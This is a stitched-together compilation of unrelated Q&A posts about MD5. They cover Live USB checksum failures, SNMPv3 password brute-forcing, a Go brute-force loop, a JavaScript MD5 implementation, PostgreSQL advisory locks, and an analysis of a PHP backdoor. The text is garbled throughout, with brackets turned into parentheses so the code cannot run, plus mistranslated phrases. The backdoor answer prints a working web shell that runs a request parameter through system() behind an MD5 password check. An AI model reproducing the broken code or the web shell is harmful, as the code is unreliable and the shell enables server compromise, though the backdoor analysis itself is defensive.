Hash – Linux Live USB media MD5 checksum integrity check failed for 5 files. Are these files relevant?

If you manually run the MD5 checksum integrity check from USB Live Boot media (Linux Mint 19), the command line will show "Failed" for these 5 files:

grub.cfg   
loopback.cfg
chain.c32
isolinux.cfg
vesamenu.c32

What could be the cause that the USB creator tool is using? Should I rewrite the ISO with another tool?
I used Yumi and added the "persistent" function.

md5 – Calculate SNMPv3 authentication hashes?

I read this article https://vad3rblog.wordpress.com/2017/09/11/snmp/ and wrote a script to implement the authentication password brute force method as described in the article.

When calculating MD5 hashes, however, the hash calculated in the article differs from the MD5 hash that I calculated using shell or online tools.

For example:

  1. In the article:
    1. The K1 and all of the message obtained in step 2 above are concatenated and the md5 hash is computed after the concatenation:
17c7dfef853adcddb2c4b71dd8d0b3e3
36363636363636363636363636363636
36363636363636363636363636363636
36363636363636363636363636363636
30818002010330110204580b8cc70203
00ffe30401050201030431302f041180
001f888062dc7f4c15465c5100000000
02010302017c040475736572040c0000
00000000000000000000040030350411
80001f888062dc7f4c15465c51000000
000400a11e0204334304ff0201000201
003010300e060a2b06010201041e0105
010500

MD5 HASH: 6a6a830535a7535d20bfebec882d5e4c
  1. When calculating the MD5 hash in the shell:
$ echo -e -n '17c7dfef853adcddb2c4b71dd8d0b3e336363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363630818002010330110204580b8cc7020300ffe30401050201030431302f041180001f888062dc7f4c15465c510000000002010302017c040475736572040c00000000000000000000000004003035041180001f888062dc7f4c15465c51000000000400a11e0204334304ff0201000201003010300e060a2b06010201041e0105010500' | md5sum
27d8dc1a6918cad48a01298eaf7eaf72  -

How do the hashes differ in both scenarios? Do I miss something in https://tools.ietf.org/html/rfc2264? In my code, I code with utf-8 before calculating the hash.

Checksum – If the site provides MD5 to check the file, can't the comparison string be changed either?

Basically, you have to forward the MD5 checksum via another trustworthy means of communication outside the band, e.g. B. that the other party sends them by registered mail or similar.

So the main thing is to check that the downloaded file is not corrupt, and it protects against some amateur attacks where a script child was able to change the file, but not the site where the download link is, for example.

To really protect yourself from such an attack, you need to use private / public key pairs, compute the hash, and encrypt with your private key. This would ensure that anyone with your public key can verify that the hash you are comparing the file for integrity with is still the hash you published because it is decrypted with your public key.

Performance – Brute Force MD5 checksum to match regex

The code starts with 128 bits of 0 (size of md5sum Checksum) then forces brutal forces to find a checksum that matches the regex (all characters of the checksum in hex are digits). I know that collisions can occur and that not all 2 ^ 128 possible checksums come out.

I know that if the code runs, it won't end soon. I will try to find out how I can change that for Loop in a parallel for Loop that uses all CPU cores.

This is one of my first (not very useful) programs in Golang. All constructive feedback is welcome.

Output:

0000000000000000000000000092FE92    14275262221639818016075488414463
000000000000000000000000009FF5EA    56052719788687373369347657641554
00000000000000000000000000BA7A1D    25521851964074241922881283516897
00000000000000000000000000E13807    19356247379454983142782955697777
00000000000000000000000000E8C976    64115693827254722796959498140064
00000000000000000000000001037BAD    68461226587668825351060559236884
0000000000000000000000000109658F    87596081213274701373126754303410
...
package main

import (
    "crypto/md5"
    "encoding/hex"
    "fmt"
    "regexp"
    "strings"
)

func main() {
    data := ()byte("x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00")

    r, _ := regexp.Compile("^(0-9){32}$")

    for {
        hash := md5.Sum(data)
        hash_hex_string := hex.EncodeToString(hash(:))

        if (r.MatchString(hash_hex_string)) {
            fmt.Printf("%X    %sn", data, strings.ToUpper(hash_hex_string))
        }

        if (!increment(data, 15)) {
            break
        }
    }
}

func increment(data ()byte, start_pos int) (bool) {
    if (start_pos < 0) {
        return false
    }

    data(start_pos)++

    if (data(start_pos) == 0) {
        return increment(data, start_pos - 1)
    }

    return true
}
```

Javascript – Custom code for MD5 in js

Hello i just wanted to write my own code for md5 in javascript and learn its internal mechanics. (I know it's no longer trustworthy, outdated, … but I'm just learning).
I didn't just want to copy the code that uses these 60 repeated lines and over-complicated functions (like here), so I started writing my own implementation:
(Although I just wrote this pseudo code in js)

function myMD5(string){
    /*bit rotation*/
    var rot = function(word, shift){return word << shift | word >>> (32 - shift);};
    /*unsigning also works cuts to 32bit words*/
    var us = function(word){return word >>> 0;};
    /*function for unsigned adding words mod 2**32*/
    var add = function(wordsarr){
        var res = 0;
        for(var wr = 0; wr < wordsarr.length; wr++)
            res = us(res + us(wordsarr(wr)));
        return res;
    };
    /*converting string to utf8encoded string to bytes to 32bit-words to 512bit padded blocks*/
    var bytes = ();
    string = unescape(encodeURIComponent(string));
    for(var char = 0; char < string.length; char++)
        bytes(char) = string.charCodeAt(char);
    bytes.push(0x80);
    var words = ();
    for(var byte = 0; byte < bytes.length; byte += 4)
        words.push(bytes(byte + 3) << 24 | bytes(byte + 2) << 16 | bytes(byte + 1) << 8 | bytes(byte));
    while(words.length % 16 != 14)
        words.push(0);
    words.push((bytes.length - 1) << 3);
    words.push((bytes.length - 1) >>> 29);
    /*initialization of the constants*/
    var K = ();
    for(var i = 1; i <= 64; i++)
        K.push(Math.floor(0x100000000 * Math.abs(Math.sin(i))));
    var shif = (0x07, 0x0c, 0x11, 0x16, 0x07, 0x0c, 0x11, 0x16, 0x07, 0x0c, 0x11, 0x16, 0x07, 0x0c, 0x11, 0x16,
                0x05, 0x09, 0x0e, 0x14, 0x05, 0x09, 0x0e, 0x14, 0x05, 0x09, 0x0e, 0x14, 0x05, 0x09, 0x0e, 0x14,
                0x04, 0x0b, 0x10, 0x17, 0x04, 0x0b, 0x10, 0x17, 0x04, 0x0b, 0x10, 0x17, 0x04, 0x0b, 0x10, 0x17,
                0x06, 0x0a, 0x0f, 0x15, 0x06, 0x0a, 0x0f, 0x15, 0x06, 0x0a, 0x0f, 0x15, 0x06, 0x0a, 0x0f, 0x15);
    var a0 = 0x67452301,
        b0 = 0xefcdab89,
        c0 = 0x98badcfe,
        d0 = 0x10325476;
    var F, ix;
    var chunk;
    var A, B, C, D;
    for(var pos = 0; pos < words.length; pos += 16){
        /*chunk = current 512bit block*/
        var chunk = words.slice(pos, pos + 16);
        A = a0;
        B = b0;
        C = c0;
        D = d0;
        for(var rnd = 0; rnd < 64; rnd++){
            /*round type*/
            if(rnd < 16){
                F = (B & C) | (~B & D);
                ix = rnd;
            }
            else if(rnd < 32){
                F = (B & D) | (C & ~D);
                ix = (5 * rnd + 1) % 16;
            }
            else if(rnd < 48){
                F = B ^ C ^ D;
                ix = (3 * rnd + 5) % 16;
            }
            else{
                F = C ^ (B | ~D);
                ix = (7 * rnd) % 16;
            }
            /*prepare for the next round, compute the temporary F*/
            F = add((F, A, K(rnd), chunk(ix)));
            A = D;
            D = C;
            C = B;
            B = add((B, rot(F, shif(rnd))));
        }
        /*add to the current state mod 2**32*/
        a0 = add((a0, A));
        b0 = add((b0, B));
        c0 = add((c0, C));
        d0 = add((d0, D));
    }
    /*return the state words as 16 bytes*/
    return (a0 >>> 24, a0 >>> 16 & 0xff, a0 >>> 8 & 0xff, a0 & 0xff,
            b0 >>> 24, b0 >>> 16 & 0xff, b0 >>> 8 & 0xff, b0 & 0xff,
            c0 >>> 24, c0 >>> 16 & 0xff, c0 >>> 8 & 0xff, c0 & 0xff,
            d0 >>> 24, d0 >>> 16 & 0xff, d0 >>> 8 & 0xff, d0 & 0xff);
};

However, it doesn't work as it should …
I've already fixed some bugs, but now I can't go wrong!
Could someone help me troubleshoot?

Algorithms – Using PostgreSQL MD5 Hash to Calculate a 64-Bit Hash for Advisory Lock Functions?

I have a particular problem addressing PostgreSQL advisory locking functions with the bigint Variants.

Basically I want to create a 64 bit bigint Value of a text Type obtained with the PostgreSQL md5() Function of any text_input_context Entrance.
Originally the md5() The function returns a 128-bit value, which is represented as a hexadecimal text value of 32 bytes.

I want to convert this to one bigint Value that I can use with the PostgreSQL Advisory Lock functions.

During some research I found a way to get the 128 bit value of the md5() Function for the first 16 bytes and convert them to a 64-bit bigint Value that can be passed to the PostgreSQL advisory lock functions:

SELECT pg_catalog.pg_advisory_lock(('x' || 
             pg_catalog.left(pg_catalog.md5(text_input_context),16)::bit(64)::bigint)

I am well aware that with that md5() Algorithm loses information regarding the text_input_context, although I want to keep that to a minimum, and even more if I only use the first 16 bytes of the md5 hash.

My question is:
Is that just a naive approach, or can we have better implementations to compute a 64-bit value from a 128-bit hash value?


PS.: Maybe this question applies better to SE database administrators, but in the end it's more about the algorithmic approach IMO.

Encryption – Can MD5 hash of a malicious URL be decrypted?

Is it possible to decrypt the md5 hash and find out which malicious website used the back doors to my server?

For the (in) feasibility of decoding the md5 hash, see here. In short, if it's simple, you can brutally force it, if it's complex, it will be impossible.

But even if you were able to decode the hash: it does not contain the information you want, i.e. H. Knowing who's using the back door. Instead, this hash is only the hash of a password and if the password (parameter p) does not match the predefined hash, then the code is not executed:

$c = "2caf6917ca3d9a3a85d26029ed623b1a";
$p = md5(urldecode($_REQUEST("p")));
if ($p != $c) exit;

The command to be executed is in the parameter s:

$s = urldecode($_REQUEST("s"));
if ($s == "") exit;
system($s);

But even that doesn't tell you who uses the back door, just what the attacker does. To get more information about the attacker, you should look at your server's access log. With any luck, you may find requests to your website with a path like this:

 /compromised.php?p=&s=

From this log, you get the password and command, and usually the IP address of the client who accessed the URL. H. The attacker's public IP address. Note that this does not have to be the attacker's actual IP address, as the attacker could use other systems (such as a botnet) as a jump host or even embed this malicious action as a URL in a site accessed by an innocent visitor – although in this case the attacker is unlikely to receive the command.

Note that the request parameters may also be sent as parameters within a POST request. In this case you only see the access to the endangered PHP script, but not the parameters in the log. However, you still have the source IP address and know when the back door was called. And you can deactivate the back door (i.e. deactivate the call on) system) and instead log parameters in the hope that the attacker will continue to try to use the back door.